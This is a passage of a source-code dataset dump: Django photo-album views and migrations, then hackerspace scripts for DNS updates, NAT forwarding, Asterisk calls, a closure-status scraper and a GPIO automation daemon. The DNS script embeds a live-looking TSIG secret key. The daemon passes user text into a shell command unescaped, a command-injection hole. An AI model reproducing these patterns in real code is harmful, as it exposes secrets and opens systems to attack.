unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0009_auto_20141025_1340'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='album',\n old_name='user_account',\n new_name='user',\n ),\n migrations.RenameField(\n model_name='photograph',\n old_name='user_account',\n new_name='user',\n ),\n ]\n" }, { "alpha_fraction": 0.5439189076423645, "alphanum_fraction": 0.5726351141929626, "avg_line_length": 23.66666603088379, "blob_id": "c3ac522bcb004a61ded198b89d41b84124a89988", "content_id": "e1ca426f696e096be955c1df41d8378d172b362d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 592, "license_type": "no_license", "max_line_length": 76, "num_lines": 24, "path": "/user_account/migrations/0003_auto_20141025_1327.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('user_account', '0002_auto_20141025_1325'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='useraccount',\n name='about',\n field=models.TextField(blank=True),\n ),\n migrations.AlterField(\n model_name='useraccount',\n name='avatar',\n field=models.ImageField(blank=True, upload_to='images/avatar/'),\n ),\n ]\n" }, { "alpha_fraction": 0.6376582384109497, "alphanum_fraction": 0.6376582384109497, "avg_line_length": 44.14285659790039, "blob_id": "1ba42dbc685a0948f51b807bde772088bb99ad59", "content_id": "e9e9cd8f356d7d198438c916eca52e85274c87fe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 632, "license_type": "no_license", "max_line_length": 110, "num_lines": 14, "path": "/wicky/urls.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.conf.urls import patterns, include, url\nfrom wicky.settings import IMAGE_ROOT\nfrom django.contrib import admin\n\nurlpatterns = patterns('',\n url(r'^$', 'main.views.home', name='home'),\n # url(r'^blog/', include('blog.urls')),\n url(r'^main/', include('main.urls')),\n url(r'^admin/', include(admin.site.urls)),\n url(r'^accounts/logout/$', 'django.contrib.auth.views.logout', {'next_page': '/'}),\n url(r'^accounts/', include('allauth.urls')),\n url(r'^user/', include('user_account.urls')),\n url(r'^images/(?P<path>.*)$', 'django.views.static.serve', {'document_root': IMAGE_ROOT}, name=\"images\"),\n)\n" }, { "alpha_fraction": 0.6816005706787109, "alphanum_fraction": 0.6816005706787109, "avg_line_length": 24.657894134521484, "blob_id": "e0023f43c103da6a85f3867c70961aa1f0287785", "content_id": "e4445e3068c8d66f76b950039b3448cb1d2cea20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2924, "license_type": "no_license", "max_line_length": 101, "num_lines": 114, "path": "/main/views.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "__author__ = 'paulina'\n\nfrom django.shortcuts import render\nfrom django.views.generic import ListView, CreateView, DetailView, UpdateView, DeleteView\nfrom .models import Photograph, Album, Category\nfrom django.contrib import messages\n\ncategory_field = ['name']\nalbum_field = ['name', 'user']\nphotograph_field = ['name', 'data', 'comment', 'latitude', 'longitude', 'user', 'category', 'albums']\n\ndef home(request):\n return render(request, 'home.html')\n\nclass CategoryIndex(ListView):\n model = Category\n\nclass CategoryCreate(CreateView):\n model = Category\n success_url = '/'\n fields = category_field\n\n def get_success_url(self):\n messages.success(self.request, 'Category successfully created')\n return super().get_success_url()\n\n\nclass CategoryShow(DetailView):\n model = Category\n\nclass CategoryUpdate(UpdateView):\n model = Category\n success_url = '/'\n fields = category_field\n\n def get_success_url(self):\n messages.success(self.request, 'Category successfully updated')\n return super().get_success_url()\n\nclass CategoryDelete(DeleteView):\n model = Category\n success_url = '/'\n\n def get_success_url(self):\n messages.success(self.request, 'Category successfully deleted')\n return super().get_success_url()\n\n\n\nclass AlbumIndex(ListView):\n model = Album\n\nclass AlbumCreate(CreateView):\n model = Album\n success_url = '/'\n fields = album_field\n\n def get_success_url(self):\n messages.success(self.request, 'Album successfully created')\n return super().get_success_url()\n\nclass AlbumShow(DetailView):\n model = Album\n\nclass AlbumUpdate(UpdateView):\n model = Album\n success_url = '/'\n fields = album_field\n\n def get_success_url(self):\n messages.success(self.request, 'Album successfully updated')\n return super().get_success_url()\n\nclass AlbumDelete(DeleteView):\n model = Album\n success_url = '/'\n\n def get_success_url(self):\n messages.success(self.request, 'Album successfully deleted')\n return super().get_success_url()\n\n\n\nclass PhotographIndex(ListView):\n model = Photograph\n\nclass PhotographCreate(CreateView):\n model = Photograph\n success_url = '/'\n fields = photograph_field\n\n def get_success_url(self):\n messages.success(self.request, 'Photo successfully created')\n return super().get_success_url()\n\nclass PhotographShow(DetailView):\n model = Photograph\n\nclass PhotographUpdate(UpdateView):\n model = Photograph\n success_url = '/'\n fields = photograph_field\n\n def get_success_url(self):\n messages.success(self.request, 'Photo successfully updated')\n return super().get_success_url()\n\nclass PhotographDelete(DeleteView):\n model = Photograph\n success_url = '/'\n\n def get_success_url(self):\n messages.success(self.request, 'Photo successfully deleted')\n return super().get_success_url()" }, { "alpha_fraction": 0.531775712966919, "alphanum_fraction": 0.5476635694503784, "avg_line_length": 26.435897827148438, "blob_id": "3ffd5077a2d4f58480bdd2888342c6b75d321f52", "content_id": "7f7066bfe622d37c01864a8be8ef0a95e7d05371", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1070, "license_type": "no_license", "max_line_length": 70, "num_lines": 39, "path": "/main/migrations/0012_auto_20141027_0030.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('main', '0011_auto_20141025_1845'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='photograph',\n name='albums',\n field=models.ManyToManyField(to='main.Album', blank=True),\n ),\n migrations.AlterField(\n model_name='photograph',\n name='category',\n field=models.ForeignKey(blank=True, to='main.Category'),\n ),\n migrations.AlterField(\n model_name='photograph',\n name='comment',\n field=models.TextField(blank=True),\n ),\n migrations.AlterField(\n model_name='photograph',\n name='latitude',\n field=models.FloatField(blank=True),\n ),\n migrations.AlterField(\n model_name='photograph',\n name='longitude',\n field=models.FloatField(blank=True),\n ),\n ]\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.5833333134651184, "avg_line_length": 23, "blob_id": "a31960517c5542156f8459cb607c20b642fd0682", "content_id": "2a824cd3d3b54dfc067c354d4e0134d5ddf7d1f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 23, "num_lines": 1, "path": "/user_account/__init__.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "__author__ = 'kruczjak'\n" }, { "alpha_fraction": 0.7175284028053284, "alphanum_fraction": 0.7200504541397095, "avg_line_length": 36.71428680419922, "blob_id": "7d33177ed9fb12a377ab30ca482360ea2a8322ea", "content_id": "d6c96ec33b83fddf90e79e68bf4063321804bdf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 793, "license_type": "no_license", "max_line_length": 89, "num_lines": 21, "path": "/user_account/views.py", "repo_name": "PaulinaLach/wicky", "src_encoding": "UTF-8", "text": "from django.dispatch import receiver\nfrom allauth.account.signals import user_signed_up\nfrom django.shortcuts import render\nfrom user_account.models import UserAccount\nfrom main.models import Photograph\n\n@receiver(user_signed_up)\ndef set_gender(sender, **kwargs):\n user = kwargs.pop('user')\n # extra_data = user.socialaccount_set.filter(provider='facebook')[0].extra_data\n # gender = extra_data['gender']\n\n # if gender == 'male': # because the default is female.\n # user.gender = 'male'\n\n user.save()\n\ndef user_show(request, username):\n user = UserAccount.objects.filter(username=username)\n photographs = Photograph.objects.filter(user=user).order_by('-creation_date')[:5]\n return render(request, 'user_account/show.html', {user: user, 'photos': photographs})\n\n" } ]
18
jabodrom/Project
https://github.com/jabodrom/Project
8a5b30f419482b6d2b8af52ded6f608ae30d8564
a1da6bdb311729909b6032a9703369df5e4e34ba
c6a56f92f7dfe5765a05699e4b7020d51e19a4e9
refs/heads/master
2021-01-01T18:41:57.553825
2015-05-13T08:45:10
2015-05-13T08:45:10
35,538,906
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6638655662536621, "alphanum_fraction": 0.6694678068161011, "avg_line_length": 17.736841201782227, "blob_id": "3f13ea96feaf0b2cd687e2e6032536569a041ac7", "content_id": "b87d9eca2cc705bd191ce4d5a91244e7fe31e135", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 49, "num_lines": 19, "path": "/myfiles.py", "repo_name": "jabodrom/Project", "src_encoding": "UTF-8", "text": "import os\n\nfor f in os.listdir(\"/Users/Полина_2/Downloads\"):\n print(f)\n\nprint(os.getcwd())\n\nos.chdir(\"/Users/Полина_2/Downloads\")\nprint(os.getcwd())\n\nprint(os.getenv(\"HOMEPATH\",\"it is Windows\"))\nprint(os.getcwd())\nmy_home = os.getenv(\"HOMEPATH\")\nfor f in os.listdir(my_home):\n print(f)\n\nos.chdir(my_home)\nfor f in os.listdir(\"Dropbox\"):\n print(f)\n\n" } ]
1
umbc-hackafe/salt-rules
https://github.com/umbc-hackafe/salt-rules
bc0f2babfd9d04325fd25e270396b049d5df8094
291d7986af930e2a55023fbc684a01468c66e8d3
d7bca9dc017ad2900a4241a642ec524baa9c3472
refs/heads/master
2020-05-21T13:43:49.726371
2018-03-12T04:32:32
2018-03-12T04:32:32
53,908,083
1
1
null
null
null
null
null
[ { "alpha_fraction": 0.6283618807792664, "alphanum_fraction": 0.694376528263092, "avg_line_length": 18.4761905670166, "blob_id": "86a63425387fca72949305f96969c5e8e304620c", "content_id": "06abb1ee3225b92a3a5735b70f90a843b1936f10", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 409, "license_type": "no_license", "max_line_length": 54, "num_lines": 21, "path": "/router/bind/dyndns", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\n## Static\n#IPV4=\"192.168.0.2\"\n#IPV6=\"2001:db8::dead:beaf\"\n## Or dynamic:\nIPV4=$(curl -s \"http://v4.ipv6-test.com/api/myip.php\")\nIPV6=$(curl -s 'http://v6.ipv6-test.com/api/myip.php')\n\nKEY=+m1tZ3f0QoByOOnRDLTy20muCyNlMZMhIBIuKsd4eQm03xgFVbaFhLQmDBXU3+iTj+e5gqcEXULo4nz6Ifv2AQ==\nNS=vegafive.hackafe.net\nDOMAIN=hackafe.net.\nZONE=hackafe.net\n\nnsupdate -y hmac-sha512:dyndns:$KEY -v << EOF\nserver $NS\nzone $ZONE\nupdate delete $DOMAIN A\nupdate add $DOMAIN 30 A $IPV4\nshow\nsend\nEOF\n" }, { "alpha_fraction": 0.5930018424987793, "alphanum_fraction": 0.6335175037384033, "avg_line_length": 27.578947067260742, "blob_id": "e374aa62e423a31f667aa2503f11284c1d12a9f9", "content_id": "8542648cfa9c939376b3b148e36c0fa7cbcbc827", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 543, "license_type": "no_license", "max_line_length": 86, "num_lines": 19, "path": "/asterisk/scripts/super-alarm.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport random\nimport sign\nimport sys\nimport os\n\nif len(sys.argv) <= 1:\n print(\"Usage: {} {} {}\".format(sys.argv[0], \"<start|finish>\", \"<extension>\"))\n sys.exit()\n\ndisplay = sign.Sign(\"dash\", 8800)\n\nif sys.argv[1] == \"start\":\n code = str(random.randrange(10000, 50000))\n print(code)\n display.new_message(code, name=\"super-alarm-\" + sys.argv[2], effects=[\"bounce_x\"])\n os.execlp(\"redial-alarm.sh\", sys.argv[2], code)\nelif sys.argv[1] == \"finish\":\n display.remove_message(\"super-alarm-\" + sys.argv[2])\n" }, { "alpha_fraction": 0.5588235259056091, "alphanum_fraction": 0.5588235259056091, "avg_line_length": 16, "blob_id": "071f84e8ecd46a0a769834e00ee145f5dafdb546", "content_id": "5f4d2923276f7059bdb3dda19826ca107177a8d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 68, "license_type": "no_license", "max_line_length": 33, "num_lines": 4, "path": "/homeautomation/car/bash_profile", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "[[ -f ~/.bashrc ]] && . ~/.bashrc\n\n\nwhile true; do blueplayer; done\n" }, { "alpha_fraction": 0.6089743375778198, "alphanum_fraction": 0.6282051205635071, "avg_line_length": 30.200000762939453, "blob_id": "943d8ba1f32eef2e7adfee099b5c7f9bed31c28d", "content_id": "c1d7667954d2f71ec23388bf5b1c58f0c212bd30", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 156, "license_type": "no_license", "max_line_length": 81, "num_lines": 5, "path": "/homeautomation/sign/bash_profile", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "[[ -f ~/.bashrc ]] && . ~/.bashrc\nsudo git -C /opt/sign pull\nsleep 3\nip a\nwhile true; do sudo /opt/sign/python/play.py -g board 2>~/.err_log; sleep 5; done\n" }, { "alpha_fraction": 0.5324384570121765, "alphanum_fraction": 0.7002236843109131, "avg_line_length": 73.33333587646484, "blob_id": "b3ebd35a7c9061518df6f5f80f98eef200d95970", "content_id": "3afab455e2bd6729303a4724ec40c5930227aba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 447, "license_type": "no_license", "max_line_length": 105, "num_lines": 6, "path": "/router/forwarding/enableforwarding", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/bash\n/usr/bin/iptables -t nat -A POSTROUTING -o enp0s18.4000 -j MASQUERADE\n/usr/bin/echo 1 > /proc/sys/net/ipv4/ip_forward\n/usr/bin/iptables -A PREROUTING -t nat -i enp0s18.4000 -p tcp --dport 80 -j DNAT --to 192.168.2.42:80\n/usr/bin/iptables -A PREROUTING -t nat -i enp0s18.4000 -p tcp --dport 8090 -j DNAT --to 192.168.2.42:8090\n/usr/bin/iptables -A PREROUTING -t nat -i enp0s18.4000 -p tcp --dport 443 -j DNAT --to 192.168.2.42:443\n\n" }, { "alpha_fraction": 0.5833333134651184, "alphanum_fraction": 0.6203703880310059, "avg_line_length": 53, "blob_id": "e20fc9034fe80d36762eaffb29da4caf35194c00", "content_id": "87b5b32085d06ed53e12c48f716ce9f804e364d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 108, "license_type": "no_license", "max_line_length": 95, "num_lines": 2, "path": "/asterisk/scripts/redial-alarm.sh", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\n( sleep 0; /usr/bin/make-call-context \"$1\" super-alarm start \"ARRAY(TARGET,CODE)\" \"$1\\\\,$2\" ) &\n" }, { "alpha_fraction": 0.4979948401451111, "alphanum_fraction": 0.5083070993423462, "avg_line_length": 33.90999984741211, "blob_id": "0d62ff7ecde40a142212b6502793d71bf5965860", "content_id": "46e9dcf1f5d14fb78da7511dfda52ab0089002ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6982, "license_type": "no_license", "max_line_length": 231, "num_lines": 200, "path": "/isumbcopen/updater.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/python3\nfrom bs4 import BeautifulSoup\nimport re\nfrom dateutil.parser import parse as dateparse\nimport datetime\nimport sys\nimport fileinput\nimport requests\n\ndebugging = False\nusefile = False\nusestdin = False\n\nargs = set(sys.argv)\n\ndef debug(string, *args, **kwargs):\n if debugging:\n print(str(string).format(*args, **kwargs))\n\nif \"debug\" in args:\n debugging = True\n\nif \"-\" in args:\n usestdin = True\n\nfor arg in args:\n if arg.startswith(\"file=\"):\n usefile = arg[5:]\n debugging = True\n\ndays = [w+\"day\" for w in [\"mon\", \"tues\", \"wednes\", \"thurs\", \"fri\", \"satur\", \"sun\"]]\nmonths = [\"january\", \"february\", \"march\", \"april\", \"may\", \"june\", \"july\", \"august\", \"september\", \"october\", \"november\", \"december\"]\nmonths.extend([m[:3] for m in months])\ndays.extend([w[:3] for w in days])\n\nif usestdin:\n myumbc = \"\"\n for line in fileinput.input():\n myumbc += line.lower()\n banners = [myumbc]\nelif usefile:\n with open(usefile) as f:\n myumbc = f.read().lower()\n banners = [myumbc]\nelse:\n try:\n req = requests.get(\"http://my.umbc.edu/discussions/14777\", headers={\"User-agent\": \"Chrome\"})\n except:\n exit(1)\n\n if not req.ok:\n exit(1)\n\n myumbc = req.text\n soup = BeautifulSoup(myumbc, \"html.parser\")\n banners_normal = [item.text for item in soup.select(\".stop.banner\")]\n banners = [b.lower() for b in banners_normal]\n\n try:\n paws = soup.select(\"#paw-discussion-14777 span\")[0]\n with open(\"/srv/http/isumbcopen.com/paws.txt\", \"w\") as pawfile:\n pawfile.write(paws.text.strip())\n except:\n pass\n\ndef detail(t):\n try:\n with open(\"/srv/http/isumbcopen.com/detail.txt\", \"w\") as details:\n details.write(t)\n except:\n pass\n\nif banners:\n for text in banners:\n debug(\"text: {}\", text.replace(\"\\n\", \"\"))\n text = text.replace(\"noon\", \"12pm\")\n text = text.replace(\"p.m.\", \"pm\")\n text = text.replace(\"a.m.\", \"am\")\n text = text.split(\".\")[0]\n datestring = \" \".join([word for word in text.split() if (re.match(\"[0-9]\", word) and len(word) < 6) or word in days or any([word.startswith(d) for d in days]) or word in months or re.match(\"[0-9]* ?[pa]\\\\.? ?m\\\\.?\", word)])\n debug(\"date: {}\", datestring)\n\n if not datestring or not datestring.strip():\n print(\"YEP\")\n detail(' '.join(banners_normal))\n exit(0)\n\n time = dateparse(datestring)\n now = datetime.datetime.now()\n\n midnight = time.replace(hour=0, minute=0, second=0, microsecond=0)\n class_start = midnight.replace(hour=5)\n class_end = midnight.replace(hour=20,minute=30)\n\n class_end_before = midnight + datetime.timedelta(hours=-3,minutes=-30)\n class_start_after = midnight + datetime.timedelta(days=1, hours=5)\n\n if debugging:\n td = datetime.timedelta(minutes=30)\n day = datetime.timedelta(days=1)\n\n # YESTERDAY\n if \"y_m\" in args:\n debug(\"yesterday morning\")\n now = now.replace(hour=7) - day\n elif \"y_sm\" in args:\n debug(\"yesterday after-school-morning\")\n now = now.replace(hour=9) - day\n elif \"y_a\" in args:\n debug(\"yesterday afternoon\")\n now = now.replace(hour=13) - day\n elif \"y_e\" in args:\n debug(\"yesterday evening\")\n now = now.replace(hour=19) - day\n elif \"y_n\" in args:\n debug(\"yesterday night\")\n now = now.replace(hour=23) - day\n\n # TODAY\n elif \"n_m\" in args:\n debug(\"now morning\")\n now = now.replace(hour=7)\n elif \"n_sm\" in args:\n debug(\"now after-school-morning\")\n now = now.replace(hour=9)\n elif \"n_a\" in args:\n debug(\"now afternoon\")\n now = now.replace(hour=13)\n elif \"n_e\" in args:\n debug(\"now evening\")\n now = now.replace(hour=19)\n elif \"n_n\" in args:\n debug(\"now night\")\n now = now.replace(hour=23)\n\n # TOMORROW\n elif \"t_m\" in args:\n debug(\"tomorrow morning\")\n now = now.replace(hour=7) + day\n elif \"t_sm\" in args:\n debug(\"tomorrow after-school-morning\")\n now = now.replace(hour=9) + day\n elif \"t_a\" in args:\n debug(\"tomorrow afternoon\")\n now = now.replace(hour=13) + day\n elif \"t_e\" in args:\n debug(\"tomorrow evening\")\n now = now.replace(hour=19) + day\n elif \"t_n\" in args:\n debug(\"tomorrow night\")\n now = now.replace(hour=23) + day\n\n debug(\"now: {:%c}\", now)\n\n if \"close\" in text and \"remain\" not in text:\n detail(\"\")\n debug(\"it's closing...\")\n if class_start < now < time < class_end:\n debug(\"Because {:%c} < {:%c} < {:%c}\", class_start, time, class_end)\n debug(\" and {:%c} < {:%c} < {:%c}\", now, time, class_end)\n print(\"UNTIL {}\".format(str(int(time.strftime(\"%I\")))))\n elif time < now < class_end:\n debug(\"Because {:%c} < {:%c} < {:%c}\", time, now, class_end)\n print(\"NOPE\")\n #elif now < class_end_before < time:\n # print(\"FOR NOW\")\n elif class_end_before < now < class_end:\n print(\"NOPE\")\n else:\n debug(\"Because else\")\n print(\"YEP\")\n elif \"open\" in text or \"delay\" in text or (\"remain\" in text and \"close\" in text):\n detail(\"\")\n if \"open\" in text:\n debug(\"says 'open'\")\n if \"delay\" in text:\n debug(\"says 'delay'\")\n\n if time == midnight and class_end_before < now < class_end:\n # If there's no date specified, then it probably is a message saying UMBC will be open throughout the day\n debug(\"it's at midnight\")\n print(\"YEP\")\n elif now > time and now < class_start_after:\n debug(\"Because {0:%c} > {1:%c} and {0:%c} < {2:%c}\", now, time, class_start_after)\n print(\"YEP\")\n elif class_end_before < now < time < class_end:\n debug(\"Because {:%c} < {:%c} < {:%c} < {:%c}\", class_end_before, now, time, class_end)\n print(\"AFTER {}\".format(str(int(time.strftime(\"%I\")))))\n #elif time == midnight and now < class_end_before < time:\n # print(\"FOR NOW\")\n else:\n debug(\"Because else\")\n print(\"YEP\")\n else:\n print(\"YEP?\")\n detail(' '.join(banners_normal))\nelse:\n debug(\"Because no banner\")\n detail(\"\")\n print(\"YEP\")\n" }, { "alpha_fraction": 0.576837420463562, "alphanum_fraction": 0.6169264912605286, "avg_line_length": 17.70833396911621, "blob_id": "8c0ae570393469983a83647f1573e19a7f283471", "content_id": "f1466be87e9eff24fbfbdba991a9156cea6ed515", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 449, "license_type": "no_license", "max_line_length": 98, "num_lines": 24, "path": "/asterisk/scripts/pizzacall", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/bin/bash\nif [ \"$#\" -lt 2 ]; then\n echo \"Usage: $0 <destination> <order-id>\"\n exit 1\nfi\n\nif [ -z \"$2\" ]; then\n echo \"Invalid order ID\"\n exit 1\nfi\n\nVAL=\"$2\"\n\n{\n cat <<EOF | sed \"s/_DEST_/$1/\" | sed \"s%_VARVAL_%$VAL%\" > /var/spool/asterisk/outgoing/call-$$\nChannel: SIP/voipo/_DEST_\nCallerID: \"Hackafe\" <2408982516>\nContext: pizza-order-send\nExtension: start\nPriority: 1\nSetVar: CHANNEL(language)=en\nSetVar: ORDER_ID=_VARVAL_\nEOF\n} &\n" }, { "alpha_fraction": 0.5431235432624817, "alphanum_fraction": 0.5468531250953674, "avg_line_length": 31.5, "blob_id": "84161ddbb1141bb65cbdf2f67c3ca41a67242a85", "content_id": "b7059f92025310318a0814781b863ed4e304ca8c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8580, "license_type": "no_license", "max_line_length": 156, "num_lines": 264, "path": "/homeautomation/openhalper.py", "repo_name": "umbc-hackafe/salt-rules", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\nimport sys\nimport flask\nfrom time import sleep, time as now\nimport subprocess\nimport threading\nimport os.path\nimport json\nimport RPi.GPIO as GPIO\nimport requests\nimport functools\n\nGPIO.setmode(GPIO.BOARD)\nGPIO.setwarnings(False)\n\ntry:\n raise TimeoutExpired()\nexcept NameError:\n class TimeoutExpired(Exception):\n pass\n subprocess.TimeoutExpired = TimeoutExpired\n\ntry:\n subprocess.check_output([\"true\"], timeout=60)\nexcept TypeError:\n subprocess.__real__check_output = subprocess.check_output\n def co_proxy(*args, **kwargs):\n if \"timeout\" in kwargs:\n del kwargs[\"timeout\"]\n return subprocess.__real__check_output(*args, **kwargs)\n subprocess.check_output = co_proxy\nexcept CalledProcessError:\n pass\n\ntry:\n raise FileNotFoundError()\nexcept NameError:\n FileNotFoundError = IOError\nexcept:\n pass\n\nACTIONS = {\n \"say\": {\n \"exec\": 'echo {[text]} | espeak --stdin --stdout | aplay',\n \"parse\": lambda r: \"\",\n \"shell\": True\n },\n \"ping\": {\n \"func\": lambda: \"OK\",\n },\n}\n\nPORT = 8081\n\nfor conf_file in \"/etc/openhalper.conf\", os.path.expanduser(\"~/.config/openhalper.conf\"), \"./openhalper.conf\":\n try:\n with open(conf_file) as f:\n conf = json.load(f)\n if \"port\" in conf:\n PORT = conf[\"port\"]\n if \"actions\" in conf:\n ACTIONS.update(conf[\"actions\"])\n except FileNotFoundError:\n pass\n except OSError:\n pass\n except IOError:\n pass\n\nfor action in ACTIONS.values():\n if \"parse\" in action and not callable(action[\"parse\"]):\n action[\"parse\"] = eval(action[\"parse\"])\n\n if \"validate\" in action and not callable(action[\"validate\"]):\n action[\"validate\"] = eval(action[\"validate\"])\n\n if \"func\" in action and not callable(action[\"func\"]):\n action[\"func\"] = eval(action[\"func\"])\n\n if \"modules\" in action:\n for module in action[\"modules\"]:\n try:\n exec(\"import {}\".format(module))\n except:\n print(\"Error importing {}\".format(module))\n\n if \"setup\" in action:\n if type(action[\"setup\"]) is list:\n for act in action[\"setup\"]:\n exec(act)\n else:\n exec(action[\"setup\"])\n\nif len(sys.argv) > 1:\n PORT = int(sys.argv[1])\n\nNEXT_UPDATES = {}\nCACHE = {}\n\ndef start_io():\n for name, item in ACTIONS.items():\n if 'type' in item and item['type'] == \"gpio_out\" or 'gpio_out' in item:\n GPIO.setup(item['pin'] if 'pin' in item else item['gpio_out'], GPIO.OUT)\n\n if 'state' in item:\n GPIO.output(item['pin'] if 'pin' in item else item['gpio_out'], item['state'])\n\n pud = GPIO.PUD_UP\n if 'pull' in item:\n if item['pull'].lower() == \"down\":\n pud = GPIO.PUD_DOWN\n elif item['pull'] == None:\n pud = None\n\n edge = GPIO.BOTH\n if 'edge' in item:\n if item['edge'].lower() == \"falling\":\n edge = GPIO.FALLING\n elif item['edge'].lower() == \"rising\":\n edge = GPIO.RISING\n\n if 'type' in item and item['type'] == \"gpio_in\" or 'gpio_in' in item:\n GPIO.setup(item['pin'] if 'pin' in item else item['gpio_in'], GPIO.IN, pull_up_down=pud)\n GPIO.add_event_detect(item['pin'] if 'pin' in item else item['gpio_in'], edge, callback=functools.partial(do_action, name))\n\n if 'type' in item and item['type'] == \"button\" or \"button\" in item:\n\n GPIO.setup(item['pin'] if 'pin' in item else item['button'], GPIO.OUT)\n if 'edgetype' in item:\n if item['edgetype'] == \"falling\":\n GPIO.output(item['pin'] if 'pin' in item else item['button'], True)\n else:\n GPIO.output(item['pin'] if 'pin' in item else item['button'], False)\n else:\n GPIO.output(item['pin'] if 'pin' in item else item['button'], True)\n\ndef init_intervals():\n for name, item in ACTIONS.items():\n if \"interval\" in item:\n NEXT_UPDATES[name] = now()\n\ndef do_action(name, *_, **kwargs):\n item = ACTIONS[name]\n result = \"\"\n valid = True\n for i in range(item[\"tries\"]) if \"tries\" in item else range(10):\n # Actions\n\n if \"exec\" in item:\n try:\n args = item[\"exec\"]\n try:\n args = [arg.format(kwargs) for arg in item[\"exec\"]]\n except:\n args = item[\"exec\"].format(**{k: v[0] for k,v in kwargs.items()})\n\n result = subprocess.check_output(args, timeout=item.get(\"timeout\", 10), shell=(item[\"shell\"] if \"shell\" in item else False)).decode('ascii')\n except subprocess.CalledProcessError as e:\n return \"Error: {0}\".format(e.returncode)\n except subprocess.TimeoutExpired:\n return \"Timed out\"\n elif \"func\" in item:\n result = item[\"func\"](**kwargs)\n elif \"gpio_in\" in item or \"type\" in item and item['type'] == \"gpio_in\":\n result = GPIO.input(item['pin'] if 'pin' in item else item['gpio_in'])\n elif \"button\" in item or \"type\" in item and item['type'] == \"button\":\n if 'edgetype' in item:\n edgetype = item['edgetype']\n else:\n edgetype = \"falling\"\n if edgetype == \"falling\":\n GPIO.output(item['pin'] if 'pin' in item else item['button'], False)\n sleep(kwargs['holdtime'] if 'holdtime' in kwargs else 0.25)\n GPIO.output(item['pin'] if 'pin' in item else item['button'], True)\n else:\n GPIO.output(item['pin'] if 'pin' in item else item['button'], True)\n sleep(kwargs['holdtime'] if 'holdtime' in kwargs else 0.25)\n GPIO.output(item['pin'] if 'pin' in item else item['button'], False)\n result = None\n else:\n result = None\n\n if \"parse\" in item:\n result = item[\"parse\"](result)\n\n # Don't do an action if the item doesn't validate, but\n # do keep trying\n if \"validate\" in item and not item[\"validate\"](result):\n continue\n\n if name in CACHE and CACHE[name][\"value\"] == result:\n if \"always\" not in item or not item[\"always\"]:\n break\n\n # Reactions\n if \"put\" in item:\n requests.put(item[\"put\"].format(value=str(result)), data=str(result))\n\n if \"get\" in item:\n requests.get(item[\"get\"].format(value=str(result)), data=str(result))\n\n if \"post\" in item:\n requests.post(item[\"post\"].format(value=str(result)), data=str(result))\n\n if \"gpio_out\" in item or \"type\" in item and item['type'] == \"gpio_out\":\n if 'state' in kwargs:\n result = bool(int(kwargs['state'][0]))\n GPIO.output(item['pin'] if 'pin' in item else item['gpio_out'], result)\n else:\n result = item['default']\n break\n\n # Don't keep trying if the result is valid\n if \"validate\" not in item or item[\"validate\"](result):\n break\n else:\n valid = False\n\n return result, valid\n\ndef do_update():\n for name, time in NEXT_UPDATES.items():\n if time <= now():\n res, valid = do_action(name)\n if valid:\n CACHE[name] = {\"value\": res, \"time\": now()}\n else:\n print(\"do_update: Not caching request for {0}, it was invalid ({1})\".format(name, res))\n NEXT_UPDATES[name] = now() + ACTIONS[name][\"interval\"]\n\n next = min([v for k, v in NEXT_UPDATES.items()] + [now() + 600])\n if next > now():\n sleep(max(next - now(), 0))\n\ndef handle_request(item, **args):\n res, valid = do_action(item, **args)\n if valid:\n CACHE[item] = {\"value\": res, \"time\": now()}\n 